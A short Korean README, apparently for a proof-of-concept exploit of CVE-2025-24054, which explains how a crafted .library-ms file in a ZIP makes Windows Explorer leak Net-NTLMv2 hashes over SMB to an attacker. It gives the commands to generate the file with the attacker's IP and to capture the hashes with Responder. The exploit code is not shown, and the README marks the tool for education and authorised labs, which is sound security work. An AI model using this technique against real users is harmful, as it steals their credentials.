
CVE-2025-24054에 대한 개념 증명 익스플로잇, Windows 라이브러리(.library-ms) NTLM 해시 노출 취약점입니다. ZIP 아카이브에서 추출될 때 SMB를 통해 Net-NTLMv2 해시를 유출하는 악성 .library-ms 파일을 생성합니다.
CVE-2025-24054에 대한 간단한 개념 증명 – Windows 라이브러리(.library-ms) NTLM 해시 노출 취약점.
⚠️ 교육 및 승인된 랩 사용 전용
CVE-2025-24054는 공격자가 특수하게 조작된 .library-ms 파일을 사용하여 Windows 시스템이 피해자의 Net-NTLMv2 해시를 유출하도록 강제할 수 있습니다.
피해자가 악성 .library-ms 파일이 포함된 ZIP을 추출하면 Windows 탐색기가 자동으로 SMB 연결을 시작하여 NTLM 해시를 유출합니다.
.library-ms 파일을 생성합니다.
python poc.py -i YOUR-IP
sudo responder -I eth0